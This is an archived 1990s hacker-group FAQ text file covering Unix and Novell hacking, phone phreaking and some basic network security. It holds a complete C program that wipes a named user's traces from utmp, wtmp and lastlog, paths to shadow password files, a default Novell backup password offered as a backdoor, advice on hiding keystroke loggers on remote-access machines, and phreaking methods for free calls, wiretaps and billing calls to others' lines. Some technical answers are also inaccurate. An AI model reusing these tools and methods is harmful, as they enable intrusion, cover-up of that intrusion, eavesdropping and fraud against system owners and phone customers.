home *** CD-ROM | disk | FTP | other *** search
/ Hacks & Cracks / Hacks_and_Cracks.iso / hackersclub / km / library / hack / chapter6.txt < prev    next >
Text File  |  1998-03-25  |  40KB  |  1,018 lines

  1. Psychotic FAQ
  2. Version 2.0
  3.  
  4. I. HACKING
  5. * What is hacking?
  6. * How do I crack shadowed passwords?
  7. * How can I tell the difference between an encrypted password and a shadowed password?
  8. * Where can I find the password file if it's shadowed?
  9. * Where is the password file located?
  10. * What is an exploit?
  11. * What are some basic telnet commands?
  12. * How do I get out of the log file?
  13. * What is a DNIC?
  14. * What is an NUA?
  15. * What is a VAX/VMS?
  16. * What is telnet?
  17. * What is an anonymous remailer?
  18. * What is PGP?
  19. * What is a tcp/ip?
  20. * What is a virus?
  21. * What is a trojan?
  22. * What is a worm?
  23. * What do I need to become a hacker?
  24. * What are some common accounts for Novell Netware?
  25. * How can I gain supervisor access to Novell Netware?
  26. * How do I access the passwords for Novell?
  27. * How do I crack a Novell Netware password?
  28. * What are the domain codes?
  29. II. PHREAKING
  30. * What is phreaking?
  31. * How do I start phreaking?
  32. * What are boxes?
  33. * What kind of boxes are there?
  34. * How do I make a box?
  35. * What is a loop?
  36. III.     Security
  37. * How do I set up an anonymous FTP server?
  38. * What are some ways that I can secure a network?
  39. * What is a "rainbow book?"
  40. * What is a sniffer?
  41. * What is a firewall?
  42. * How can I use PGP to benefit me?
  43. IV.     Group Questions
  44. * What is Psychotic?
  45. * Is Psychotic looking for new members?
  46. * What is Psychosis?
  47. * Where can I find some good resources on hacking and phreaking?
  48. * Who are all the members in Psychotic?
  49. * What is the Psychotic Tech Lab?
  50. * What are Psychotic's offered services?
  51.  
  52. Q. What is hacking?
  53.  
  54. A. Hacking is the art of breaking into computers to gain knowledge that our
  55. society has hidden from us. Hacking is illegal and the government spend lots
  56. of money each year to have hackers arrested.....when they should be spending
  57. the money on more important issues.
  58.  
  59. Q. What is a shadowed password?
  60.  
  61. A. A shadowed password is a cover for the real password file. It shows that
  62. the real password is hidden somewhere else.
  63.  
  64. Q. How do I crack shadowed passwords?
  65.  
  66. A. Cracking a shadowed password file is impossible. Assuming that you got
  67. the password file via anonymous ftp. You should try connecting to port 25
  68. and doing the sendmail bug.
  69.  
  70. Q. What is the difference between an encrypted password and a shadowed
  71. password?
  72.  
  73. A. An encrypted password is just the real password scrambled and changed.
  74. It can be cracked with a password cracked and a word file. A shadowed
  75. password hides the encrypted password somewhere else other than the etc.
  76. dir.
  77.  
  78. Q.     Where can I find the password file if it's shadowed?
  79.  
  80. A. Unix                  Path                            Token
  81. -----------------------------------------------------------------
  82. AIX 3                 /etc/security/passwd            !
  83.           or             /tcb/auth/files//
  84. A/UX 3.0s             /tcb/files/auth/?/*
  85. BSD4.3-Reno           /etc/master.passwd              *
  86. ConvexOS 10           /etc/shadpw                     *
  87. ConvexOS 11           /etc/shadow                     *
  88. DG/UX                 /etc/tcb/aa/user/               *
  89. EP/IX                 /etc/shadow                     x
  90. HP-UX                 /.secure/etc/passwd             *
  91. IRIX 5                /etc/shadow                     x
  92. Linux 1.1             /etc/shadow                     *
  93. OSF/1                 /etc/passwd[.dir|.pag]          *
  94. SCO Unix #.2.x        /tcb/auth/files//
  95. SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
  96. SunOS 5.0             /etc/shadow
  97.                                   
  98. System V Release 4.0  /etc/shadow                     x
  99. System V Release 4.2  /etc/security/* database
  100. Ultrix 4              /etc/auth[.dir|.pag]            *
  101. UNICOS                /etc/udb                        *
  102.  
  103. Q. Where is the password file located?
  104.  
  105. A. The password file is located in the etc/passwd dir. You can get into the
  106. etc dir by logging on to the domain via anonymous ftp.
  107.  
  108. Q. What is an exploit?
  109.  
  110. A. An exploit is something that exploits unix or another kind of OS. You
  111. usually use exploits to gain root or high access to a system. They can prove
  112. to be very handy.
  113.  
  114. Q. What are some basic telnet commands?
  115.  
  116. A. Below is a list of common telnet commands.
  117.  
  118. Command                                                          Function
  119.  
  120. access                        Telnet account
  121. c                        Connect to a host
  122. cont                        Continue
  123. d                        Disconnect
  124. full                        Network echo
  125. half                        Terminal echo
  126. hangup                        Hangs up
  127. mail                        Mail
  128. set                        Select PAD parameters
  129. stat                        Show network port.
  130. telemail                        Mail
  131.  
  132. Q.     How do I get out of the log file?
  133.  
  134. A. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
  135. files that can be edited by hand with vi, you must use a program
  136. specifically written for this purpose.
  137. Example:
  138.  
  139. #include 
  140. #include 
  141. #include 
  142. #include 
  143. #include 
  144. #include 
  145. #include 
  146. #include 
  147. #define WTMP_NAME "/usr/adm/wtmp"
  148. #define UTMP_NAME "/etc/utmp"
  149. #define LASTLOG_NAME "/usr/adm/lastlog"
  150.  
  151. int f;
  152.  
  153. void kill_utmp(who)
  154. char *who;
  155. {
  156.     struct utmp utmp_ent;
  157.  
  158.   if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  159.         while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  160.           if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  161.                           bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  162.                           lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  163.                           write (f, &utmp_ent, sizeof (utmp_ent));
  164.                   }
  165.         close(f);
  166.   }
  167. }
  168.  
  169. void kill_wtmp(who)
  170. char *who;
  171. {
  172.     struct utmp utmp_ent;
  173.     long pos;
  174.  
  175.     pos = 1L;
  176.     if ((f=open(WTMP_NAME,O_RDWR))>=0) {
  177.  
  178.         while(pos != -1L) {
  179.            lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  180.            if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  181.                 pos = -1L;
  182.            } else {
  183.                 if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  184.                         bzero((char *)&utmp_ent,sizeof(struct utmp ));
  185.                         lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  186.                         write (f, &utmp_ent, sizeof (utmp_ent));
  187.                         pos = -1L;
  188.                 } else pos += 1L;
  189.            }
  190.         }
  191.         close(f);
  192.   }
  193. }
  194.  
  195. void kill_lastlog(who)
  196. char *who;
  197. {
  198.     struct passwd *pwd;
  199.     struct lastlog newll;
  200.  
  201.         if ((pwd=getpwnam(who))!=NULL) {
  202.  
  203.            if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  204.                   lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  205.                   bzero((char *)&newll,sizeof( newll ));
  206.                   write(f, (char *)&newll, sizeof( newll ));
  207.                   close(f);
  208.            }
  209.  
  210.     } else printf("%s: ?\n",who);
  211. }
  212.  
  213. main(argc,argv)
  214. int argc;
  215. char *argv[];
  216. {
  217.     if (argc==2) {
  218.            kill_lastlog(argv[1]);
  219.            kill_wtmp(argv[1]);
  220.            kill_utmp(argv[1]);
  221.            printf("Zap2!\n");
  222.     } else
  223.     printf("Error.\n");
  224. }
  225.  
  226. Q. What is DNIC?
  227.  
  228. A. A DNIS says which network connect to the telnet you are using.
  229.  
  230. Q. What is NUA?
  231.  
  232. A.     The NUA is the address of the computer on telnet.
  233.  
  234. Q.     What is a VAX/VMS?
  235.  
  236. A.     A vax/vms is Digital Equipment's major computer line. It's
  237. proprietary operating system is known as vms.
  238.  
  239. Q.     What is telnet?
  240.  
  241. A. Telnet is a program which lets you log in to other computers on the net.
  242.  
  243. Q.     What is an anonymous remailer?
  244.  
  245. A. An anonymous remailer is a system on the Internet that allows you to
  246. send e-mail anonymously or post messages to Usenet anonymously. You apply
  247. for an anonymous ID at the remailer site. Then, when you send a message to
  248. the remailer, it sends it out from your anonymous ID at the remailer. No one
  249. reading the post will know your real account name or host name. If someone
  250. sends a message to your anonymous ID, it will be forwarded to your real
  251. account by the remailer.
  252.  
  253. Q.     What is PGP?
  254.  
  255. A. This FAQ answer is excerpted from:
  256. PGP(tm) User's Guide Volume I: Essential Topics by Philip Zimmermann
  257. PGP(tm) uses public-key encryption to protect E-mail and data files.
  258. Communicate securely with people you've never met, with no secure channels
  259. needed for prior exchange of keys. PGP is well featured and fast, with
  260. sophisticated key management, digital signatures, data compression, and good
  261. ergonomic design.
  262.  
  263. Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a high
  264. security cryptographic software application for MS-DOS, Unix, VAX/VMS, and
  265. other computers. PGP allows people toexchange files or messages with privacy, authentication, and convenience. Privacy means that only those intended to receive a message can read it. Authentication means that messages that appear to be from a particular person can only have originated from that person. Convenience means that privacy and authentication are provided without the hassles of managing keys associated with conventional cryptographic software. No secure channels are needed to exchange keys between users, which makes PGP much easier to use. This is because PGP is based on a powerful new technology called "public key" cryptography. PGP combines the convenience of the Rivest-Shamir-Adleman (RSA) public key cryptosystem with the speed of conventional cryptography, message digests for digital signatures, data compression before encryption, good ergonomicdesign, and sophisticated key management. And PGP performs the public-key
  266. functions faster than most other software implementations. PGP is public
  267. key cryptography for the masses.
  268.  
  269. Q.     What is tcp/ip?
  270.  
  271. A. Tcp/ip is the system networks use to communicate with each other. It
  272. stands for Transmission Control Protocol/Internet Protocol.
  273.  
  274. Q. What is a virus?
  275.  
  276. A.     A Virus is a program which reproduces itself. It may attach itself
  277. to other programs, it may create copies of itself. It may damage or corrupt
  278. data, change data, or degrade the performance of your system by utilizing
  279. resources such as memory or disk space. Some Viruse scanners detect some
  280. Viruses. No Virus scanners detect all Viruses. Virus scanners will work
  281. for a while but people are always creating virii that will beat them.
  282.  
  283. Q.     What is a trojan?
  284.  
  285. A.     A trojan is a program which does an unauthorized function, hidden
  286. inside an authorized program. It does something other than it claims to do,
  287. usually something malicious, and it is intended by the author to do whatever
  288. it does. If it is not intentional, it is called a bug.
  289.  
  290. Q.     What is a worm?
  291.  
  292. A.     Worms are programsthat copy themselves over and over using up space
  293. and slowing down the system. They are self contained and use the networks
  294. to spread, in much the same way that Viruses use files to spread. Some
  295. people say the solution to Viruses and worms is to just not have any files
  296. or networks.
  297.  
  298.  
  299. Q.     What do I need to become a hacker?
  300.  
  301. A.     You should start off with a good scanner, some dialups, a telnet
  302. client, and some knowladge of hacking. Those are the basic things that you
  303. will need. If you are serious about hacking then you should get Unix, or
  304. Linux(smaller, free version of unix).
  305.  
  306. Q.     What are some common accounts for Novell Netware?
  307.  
  308. A.   Below is a list of commonly used accounts for Novell Netware.
  309.        Account         Purpose
  310.         ----------      ------------------------------------------------------
  311.         PRINT           Attaching to a second server for printing
  312.         LASER           Attaching to a second server for printing
  313.         HPLASER         Attaching to a second server for printing
  314.         PRINTER         Attaching to a second server for printing
  315.         LASERWRITER     Attaching to a second server for printing
  316.         POST            Attaching to a second server for email
  317.         MAIL            Attaching to a second server for email
  318.         GATEWAY         Attaching a gateway machine to the server
  319.         GATE            Attaching a gateway machine to the server
  320.         ROUTER          Attaching an email router to the server
  321.         BACKUP          May have password/station restrictions (see below),used
  322.                         for backing up the server to a tape unit attached to a
  323.                         workstation. For complete backups, Supervisor equivalence
  324.                         is required.
  325.         WANGTEK         See BACKUP
  326.         FAX             Attaching a dedicated fax modem unit to the network
  327.         FAXUSER         Attaching a dedicated fax modem unit to the network
  328.         FAXWORKS        Attaching a dedicated fax modem unit to the network
  329.         TEST            A test user account for temp use
  330.         ARCHIVIST       Palidrome default account for backup
  331.         CHEY_ARCHSVR    An account for Arcserve to login to the server from    
  332.                         from the console for tape backup. Version 5.01g's
  333.                         password was WONDERLAND. Delete the Station
  334.                         Restrictions and use SUPER.EXE to toggle this 
  335.                         account and you have an excellent backdoor.
  336.         WINDOWS_PASSTHRU Although not required, per the Microsoft Win95
  337.                         Resource Kit, Ch. 9 pg. 292 and Ch. 11 pg. 401 you
  338.                         need this for resource sharing without a password.
  339.  
  340. Q.     How can I gain supervisor access to Novell Netware?
  341.  
  342. A. Taken from the Novell Netware FAQ.
  343. The secret method is the method of using a DOS-based sector editor to edit the
  344. entry in the FAT, and reset the bindery to default upon server reboot. This gives
  345. you Supervisor and Guest with no passwords. The method was taught in case you 
  346. lost Supervisor on a Netware 2.15 server and you had no supe equivalent accounts
  347. created. It also saves the server from a wipe and reboot in case the
  348. Supervisor account is corrupt, deleted, or trashed.
  349.  
  350.  
  351. Q.     How do I access the password file for Novell?
  352.  
  353. A. access to the password file in Netware is not like Unix - the password
  354. file isn't in the open. All objects and their properties are kept in the
  355. bindery files on 2.x and 3.x, and kept in the NDS database in 4.x. An
  356. example of an object might be a printer, a group, an individual's account
  357. etc. An example of an object's properties might include an account's
  358. password or full user name, or a group's member list or full name. The
  359. bindery files attributes (or flags) in 2.x and 3.x are Hidden and System,
  360. and these files are located on the SYS: volume in the SYSTEM subdirectory.
  361. Their names are as follows:
  362.  
  363.         Netware version         File Names
  364.         ---------------         ----------
  365.         2.x                     NET$BIND.SYS, NET$BVAL.SYS
  366.         3.x                     NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS
  367.  
  368. The NET$BVAL.SYS and NET$VAL.SYS are where the passwords are actually located
  369. in 2.x and 3.x respectively.
  370.  
  371.  
  372. Q.     How do I crack a Novell password?
  373.  
  374. A.     Taken from the Novell Netware Hack FAQ.
  375.  
  376. If Intruder Detection is off, you can use a "brute force" password cracker.
  377.  
  378. Encrypted passwords is Novell's way of protecting passwords from sniffers.
  379. Since older versions of Netware (2.15c) sent passwords as plain text over the
  380. wire, a sniffer could see the password as it went by. To secure things,
  381. Novell gave the administrator a way to control this. Later versions of the
  382. LOGIN.EXE program would encrypt the password before transmitting it across
  383. the wire to the server. But before this could happen, the shell (NETX) had
  384. to be updated. Since some locations had to have older shells and older
  385. versions of LOGIN.EXE to support older equipment, the administrator has the
  386. option of allowing unencrypted passwords to access the server. This is done
  387. by typing SET ALLOW UNENCRYPTED PASSWORDS=ON at the console or by adding it
  388. to the AUTOEXEC.NCF. The default is OFF, which means NOVELBFH could be beeping
  389. the server console every attempt! Fortunately most sites turn this switch on
  390. to support some old device.
  391.  
  392. If you have access to the console, either by standing in front of it or by
  393. RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM or SETPWD.NLM to reset
  394. passwords. Just load the NLM and pass it command line parameters:
  395.  
  396.         NLM             Account(s) reset        Netware version(s) supported
  397.         ------------    -----------------       ----------------------------
  398.         SETSPASS.NLM    SUPERVISOR              3.x
  399.         SETSPWD.NLM     SUPERVISOR              3.x, 4.x
  400.         SETPWD.NLM      any valid account       3.x, 4.x
  401.  
  402. If you can plant a password catcher or keystroke reader, you can get them
  403. this way. The LOGIN.EXE file is located in the SYS:LOGIN directory, and
  404. normally you will not have access to put a file in that directory. The best
  405. place to put a keystroke capture program is in the workstation's path, with
  406. the ATTRIB set as hidden. The advantage is that you'll get the password and
  407. Netware won't know you swiped it. The disadvantage is getting access to the
  408. machine to do this. The very best place to put one of these capture programs
  409. is on a common machine, like a pcAnywhere box, which is used for remote access.
  410. Many locations will allow pcAnywhere access to a machine with virtually no 
  411. software on it, and control security access to the LAN by using Netware's 
  412. security features. Uploading a keystroke capture program to a machine like 
  413. this defeats this.
  414.  
  415. Q.     What are the domain codes?
  416.  
  417. A. Below is the current list of domain codes.
  418. AD   Andorra
  419. AE   United Arab Emirates
  420. AF   Afghanistan
  421. AG   Antigua and Barbuda
  422. AI   Anguilla
  423. AL   Albania
  424. AM   Armenia
  425. AN   Netherland Antilles
  426. AO   Angola
  427. AQ   Antarctica
  428. AR   Argentina
  429. AS   American Samoa
  430. AT   Austria
  431. AU   Australia
  432. AW   Aruba
  433. AZ   Azerbaidjan
  434. BA   Bosnia-Herzegovina
  435. BB   Barbados
  436. BD   Banglades
  437. BE   Belgium
  438. BF   Burkina Faso
  439. BG   Bulgaria
  440. BH   Bahrain
  441. BI   Burundi
  442. BJ   Benin
  443. BM   Bermuda
  444. BN   Brunei Darussalam
  445. BO   Bolivia
  446. BR   Brazil
  447. BS   Bahamas
  448. BT   Buthan
  449. BV   Bouvet Island
  450. BW   Botswana
  451. BY   Belarus
  452. BZ   Belize
  453. CA   Canada
  454. CC   Cocos (Keeling) Islands
  455. CF   Central African Republic
  456. CG   Congo
  457. CH   Switzerland
  458. CI   Ivory Coast
  459. CK   Cook Islands
  460. CL   Chile
  461. CM   Cameroon
  462. CN   China
  463. CO   Colombia
  464. CR   Costa Rica
  465. CS   Czechoslovakia
  466. CU   Cuba
  467. CV   Cape Verde
  468. CX   Christmas Island
  469. CY   Cyprus
  470. CZ   Czech Republic
  471. DE   Germany
  472. DJ   Djibouti
  473. DK   Denmark
  474. DM   Dominica
  475. DO   Dominican Republic
  476. DZ   Algeria
  477. EC   Ecuador
  478. EE   Estonia
  479. EG   Egypt
  480. EH   Western Sahara
  481. ES   Spain
  482. ET   Ethiopia
  483. FI   Finland
  484. FJ   Fiji
  485. FK   Falkland Islands (Malvinas)
  486. FM   Micronesia
  487. FO   Faroe Islands
  488. FR   France
  489. FX   France (European Territory)
  490. GA   Gabon
  491. GB   Great Britain (UK)
  492. GD   Grenada
  493. GE   Georgia
  494. GH   Ghana
  495. GI   Gibraltar
  496. GL   Greenland
  497. GP   Guadeloupe (French)
  498. GQ   Equatorial Guinea
  499. GF   Guyana (French)
  500. GM   Gambia
  501. GN   Guinea
  502. GR   Greece
  503. GT   Guatemala
  504. GU   Guam (US)
  505. GW   Guinea Bissau
  506. GY   Guyana
  507. HK   Hong Kong
  508. HM   Heard and McDonald Islands
  509. HN   Honduras
  510. HR   Croatia
  511. HT   Haiti
  512. HU   Hungary
  513. ID   Indonesia
  514. IE   Ireland
  515. IL   Israel
  516. IN   India
  517. IO   British Indian Ocean Territory
  518. IQ   Iraq
  519. IR   Iran
  520. IS   Iceland
  521. IT   Italy
  522. JM   Jamaica
  523. JO   Jordan
  524. JP   Japan
  525. KE   Kenya
  526. KG   Kirgistan
  527. KH   Cambodia
  528. KI   Kiribati
  529. KM   Comoros
  530. KN   Saint Kitts Nevis Anguilla
  531. KP   North Korea
  532. KR   South Korea
  533. KW   Kuwait
  534. KY   Cayman Islands
  535. KZ   Kazachstan
  536. LA   Laos
  537. LB   Lebanon
  538. LC   Saint Lucia
  539. LI   Liechtenstein
  540. LK   Sri Lanka
  541. LR   Liberia
  542. LS   Lesotho
  543. LT   Lithuania
  544. LU   Luxembourg
  545. LV   Latvia
  546. LY   Libya
  547. MA   Morocco
  548. MC   Monaco
  549. MD   Moldavia
  550. MG   Madagascar
  551. MH   Marshall Islands
  552. ML   Mali
  553. MM   Myanmar
  554. MN   Mongolia
  555. MO   Macau
  556. MP   Northern Mariana Islands
  557. MQ   Martinique (French)
  558. MR   Mauritania
  559. MS   Montserrat
  560. MT   Malta
  561. MU   Mauritius
  562. MV   Maldives
  563. MW   Malawi
  564. MX   Mexico
  565. MY   Malaysia
  566. MZ   Mozambique
  567. NA   Namibia
  568. NC   New Caledonia (French)
  569. NE   Niger
  570. NF   Norfolk Island
  571. NG   Nigeria
  572. NI   Nicaragua
  573. NL   Netherlands
  574. NO   Norway
  575. NP   Nepal
  576. NR   Nauru
  577. NT   Neutral Zone
  578. NU   Niue
  579. NZ   New Zealand
  580. OM   Oman
  581. PA   Panama
  582. PE   Peru
  583. PF   Polynesia (French)
  584. PG   Papua New
  585. PH   Philippines
  586. PK   Pakistan
  587. PL   Poland
  588. PM   Saint Pierre and Miquelon
  589. PN   Pitcairn
  590. PT   Portugal
  591. PR   Puerto Rico (US)
  592. PW   Palau
  593. PY   Paraguay
  594. QA   Qatar
  595. RE   Reunion (French)
  596. RO   Romania
  597. RU   Russian Federation
  598. RW   Rwanda
  599. SA   Saudi Arabia
  600. SB   Solomon Islands
  601. SC   Seychelles
  602. SD   Sudan
  603. SE   Sweden
  604. SG   Singapore
  605. SH   Saint Helena
  606. SI   Slovenia
  607. SJ   Svalbard and Jan Mayen Islands
  608. SK   Slovak Republic
  609. SL   Sierra Leone
  610. SM   San Marino
  611. SN   Senegal
  612. SO   Somalia
  613. SR   Suriname
  614. ST   Saint Tome and Principe
  615. SU   Soviet Union
  616. SV   El Salvador
  617. SY   Syria
  618. SZ   Swaziland
  619. TC   Turks and Caicos Islands
  620. TD   Chad
  621. TF   French Southern Territory
  622. TG   Togo
  623. TH   Thailand
  624. TJ   Tadjikistan
  625. TK   Tokelau
  626. TM   Turkmenistan
  627. TN   Tunisia
  628. TO   Tonga
  629. TP   East Timor
  630. TR   Turkey
  631. TT   Trinidad and Tobago
  632. TV   Tuvalu
  633. TW   Taiwan
  634. TZ   Tanzania
  635. UA   Ukraine
  636. UG   Uganda
  637. UK   United Kingdom
  638. UM   US Minor Outlying Islands
  639. US   United States
  640. UY   Uruguay
  641. UZ   Uzbekistan
  642. VA   Vatican City State
  643. VC   Saint Vincent and Grenadines
  644. VE   Venezuela
  645. VG   Virgin Islands (British)
  646. VI   Virgin Islands (US)
  647. VN   Vietnam
  648. VU   Vanuatu
  649. WF   Wallis and Futuna Islands
  650. WS   Samoa
  651. YE   Yemen
  652. YU   Yugoslavia
  653. ZA   South Africa
  654. ZM   Zambia
  655. ZR   Zaire
  656. ZW   Zimbabwe
  657. ARPA   Old style Arpanet
  658. COM   US Commercial
  659. EDU   US Educational
  660. GOV   US Government
  661. INT   International
  662. MIL   US Military
  663. NATO   Nato field
  664. NET   Network
  665. ORG   Non-Profit
  666.  
  667.  
  668.  
  669. Q.     What is phreaking?
  670.  
  671. A. Phreaking is anything illegal that has to do with phones and phone lines.
  672.  
  673. Q.     How do I start phreaking?
  674.  
  675. A. You should start by learning about boxes and reading up on different
  676. types of phreaking.
  677.  
  678. Q. What kind of boxes are there?
  679.  
  680. A.Below is a list of the most common boxes and what they do.
  681.  
  682. Acrylic Box - Steal Three-Way-Calling and Call Waiting. 
  683. Aero Box - Make free fone calls from Payfones. 
  684. Aqua Box - Drain voltage from a FBI Lock In Trace call. 
  685. Beige Box - Replicates a line mens hand-set. 
  686. Black Box - Allows the calling party not to get charged for the call they place.
  687. Blast Box - Fone Microphone Amplifier. 
  688. Blotto Box - Shorts every fone out in the area. 
  689. Blue Box - Utilizing 2600Hz tones for free fone calls. 
  690. Brown Box - Creates a party line from 2 existing fone lines. 
  691. Bud Box - Used to tap into your neighbors fone line. 
  692. Busy Box - Used to kill the dial tone on someone's fone. 
  693. Chartreuse Box - Use the electricty from your phone for other things. 
  694. Cheese Box - Turns your fone into a Payfone. 
  695. Chrome Box - Lets you manipulate traffic signals via remote control. 
  696. Clear Box - Used to make free calls on Fortress Fones. 
  697. Copper Box - Causes cross-talk interference on an extender. 
  698. Crimson Box - Acts as a 'Hold' button for your fone. 
  699. Dark Box - REroutes outgoing or incomming calls to another fone. 
  700. Dayglo Box - Allows you to connect to your neighbors fone line. 
  701. Ditto Box - Allows you to evesdrop on another fone line. 
  702. Divertor Box - REroutes outgoing or incomming calls to another fone. 
  703. DLOC Box - Lets you confrence 2 fone lines (other than your own). 
  704. Gold Box - Allows you to trace a call or tell if its being traced. 
  705. Green Box - Lets you make the Coin Collect, Coin Return, and Ringback tones. 
  706. Jack Box - A touch-tone keypad. 
  707. Light Box - An AM Transmitter. 
  708. Lunch Box - Used to tap into your neighbors fone line. 
  709. Magenta Box - Connects one remote fone line to another remote fone line. 
  710. Mauve Box - Lets you fone tap without cutting into the fone line. 
  711. Neon Box - An external microphone. 
  712. New Gold Box - A new updated version of the Gold Box. 
  713. Noise Box - Creates line noise. 
  714. Olive Box - Used as an external ringer. 
  715. Paisley Box - A combination of almost all the boxes there are. 
  716. Pandora Box - Creates a high intensity tone which can cause pain. Good for pranking. 
  717. Party Box - Lets you make a party line from 2 fone lines. 
  718. Pearl Box - A tone generator. 
  719. Pink Box - Lets you hook 2 seprate fone lines together and have 3 way calling. 
  720. Purple Box - A fone hold button. 
  721. Rainbow Box - Kills a trace by putting 120v into the fone line. 
  722. BoRed x - Lets you make free calls from a payfone by producing the coins tones. 
  723. Rock Box - Adds music to your fone line. 
  724. Scarlet Box - Silver Box - Adds DTMF A, B, C, & D priority tones to your line. 
  725. Slush Box - Can be installed at places of business that have standard multi-line fones. 
  726. Static Box - Keep voltage on a fone line high. 
  727. Switch Box - Adds hold, indicator lights, confrence, etc. 
  728. Tan Box - Line activated telefone recorder. 
  729. Tron Box - Reverse the phase of power to your house, and make your meter run slower.
  730. Urine Box - Makes a disturbance between the ring and tip wires in someones fone. 
  731. Violet Box - Keeps a payfone from hanging up. 
  732. White Box - A portable DTMF keypad. 
  733. Yellow Box - Add an extention fone.
  734.  
  735. Q.     How do I make a box?
  736.  
  737. A.     Each box has a sepperate plan to set it up. Just do a netsearch for
  738. phreaking or boxes and you can find all the plans you need.
  739.  
  740. Q.     What is a loop?
  741.  
  742. A. This FAQ answer is excerpted from:
  743. ToneLoc v0.99 User Manual by Minor Threat & Mucho Maas
  744. Loops are a pair of phone numbers, usually consecutive, like 836-9998 and 
  745. 836-9999. They are used by the phone company for testing. What good do 
  746. loops do us? Well, they are cool in a few ways. Here is a simple use of 
  747. loops. Each loop has two ends, a 'high' end, and a 'low' end. One end gives
  748. a (usually) constant, loud tone when it is called. The other end is silent.
  749. Loops don't usually ring either. When BOTH ends are called, the people that 
  750. called each end can talk through the loop.  Some loops are voice filtered 
  751. and won't pass anything but a constant tone; these aren't much use to you. 
  752. Here's what you can use working loops for: billing phone calls! First, call 
  753. the end that gives the loud tone. Then if the operator or someone calls the 
  754. other end, the tone will go quiet. Act like the phone just rang and you 
  755. answered it ... say "Hello", "Allo", "Chow", "Yo", or what the fuck ever. 
  756. The operator thinks that she just called you, and that's it! Now the phone 
  757. bill will go to the loop, and your local RBOC will get the bill! Use this 
  758. technique in moderation, or the loop may go down. Loops are probably most 
  759. useful when you want to talk to someone to whom you don't want to give your 
  760. phone number.
  761.  
  762. Q.     How do I set up an anonymous FTP?
  763.  
  764. A. Taken from the Internet Security Systems, Inc. text on setting up an anonymous ftp.
  765. - 1.Build a statically linked version of ftpd and put it in ~ftp/bin. Make sure it's owned by root. 
  766.      - 2.Build a statically linked version of /bin/ls if you'll need one. Put it in ~ftp/bin. 
  767.      If you are on a Sun, and need to build one, there's a ported version of
  768.      the BSD net2 ls command for SunOs
  769.      on ftp.tis.com: pub/firewalls/toolkit/patches/ls.tar.Z Make sure it's owned by root. 
  770.      - 3.Chown ~ftp to root and make it mode 755 THIS IS VERY IMPORTANT 
  771.     -  4.Set up copies of ~ftp/etc/passwd and ~ftp/etc/group just as you would normally, EXCEPT
  772.      make 'ftp's home directory '/' -- make sure they are owned by root. 
  773.     -  5.Write a wrapper to kick ftpd off and install it in /etc/inetd.conf The wrapper should look
  774.      something like: (assuming ~ftp = /var/ftp) 
  775.      main()
  776.  
  777.      {
  778.  
  779.      if(chdir("/var/ftp")) {
  780.  
  781.              perror("chdir /var/ftp");
  782.  
  783.              exit(1);
  784.  
  785.      }
  786.  
  787.      if(chroot("/var/ftp")) {
  788.  
  789.              perror("chroot /var/ftp");
  790.  
  791.              exit(1);
  792.  
  793.      }
  794.  
  795.      /* optional: seteuid(FTPUID); */
  796.  
  797.      execl("/bin/ftpd","ftpd","-l",(char *)0);
  798.  
  799.      perror("exec /bin/ftpd");
  800.  
  801.      exit(1);
  802.  
  803.      }
  804.      Options: 
  805.      You can use 'netacl' from the toolkit or tcp_wrappers to achieve the same effect. 
  806.      We use 'netacl' to switch so that a few machines that connect to the FTP service *don't* get
  807.      chrooted first. This makes transferring files a bit less painful. 
  808.      You may also wish to take your ftpd sources and find all the places where it calls seteuid()
  809.      and remove them, then have the wrapper do a setuid(ftp) right before the exec. This means
  810.      that if someone knows a hole that makes them "root" they still won't be. Relax and imagine
  811.      how frustrated they will be. 
  812.      If you're hacking ftpd sources, I suggest you turn off a bunch of the options in ftpcmd.y by
  813.      unsetting the "implemented" flag in ftpcmd.y. This is only practical if your FTP area is
  814.      read-only. 
  815. -   6.As usual, make a pass through the FTP area and make sure that the files are in correct modes
  816.      and that there's nothing else in there that can be executed. 
  817. -   7.Note, now, that your FTP area's /etc/passwd is totally separated from your real /etc/passwd.
  818.      This has advantages and disadvantages. 
  819. -    8.Some stuff may break, like syslog, since there is no /dev/log. Either build a version of ftpd
  820.      with a UDP-based syslog() routine or run a second syslogd based on the BSD Net2 code,
  821.      that maintains a unix-domain socket named ~ftp/dev/log with the -p flag.
  822.  
  823. Q.     What are some ways I can secure a network?
  824.  
  825. A.     Taken from the Internet Security Systems text on securing a network.
  826. 1. Well first of all you should know what type of resources that you're
  827.      trying to protect: CPU, files, storage devices phone lines, etc... 
  828.  2. Determine the host-specific security measures needed. Password
  829.      protection, file encryption, firewall, etc...
  830.      Determine who the computer systems must be defended. 
  831.      Determine the likelihood of a threat. 
  832.      Implement measures to protect network resource. 
  833.  
  834. 3. Consider the corporate budget when planning for Internet Security.
  835.  
  836. 4. Design a Security Policy that describes your organization's network
  837. security concerns. This policy should take into account the following:
  838.  
  839.      Network Security Planning 
  840.      Site Security Policy 
  841.      Risk Analysis 
  842.      Risk analysis involves determining the following:
  843.           What you need to protect 
  844.           What you need to protect it from 
  845.           How to protect it 
  846.           Estimating the risk of losing the resource 
  847.           Estimating the importance of the resource 
  848.  
  849. 5. Consider the following factors to determine who will grant access to
  850. services on your networks:
  851.      Will access to services be granted from a central point? 
  852.      What methods will you use to create accounts and terminate access? 
  853.  
  854. 6. Design and Implement Packet Filter Rules
  855.  
  856. 7. Ensure your Firewall has the following properties:
  857.      All traffic from inside to outside, as well as outside to inside must
  858.      pass through the firewall. 
  859.      Allow only authorized traffic as defined by your corporate security
  860.      policy be passed through the firewall. 
  861.      Ensure the firewall is immune to penetration. 
  862.  
  863. 8. Educate users about password protection:
  864.      Educating users not to use passwords that are easy to guess. 
  865.      Ensuring the password lengths are adequate. 
  866.      Running a password guesser. 
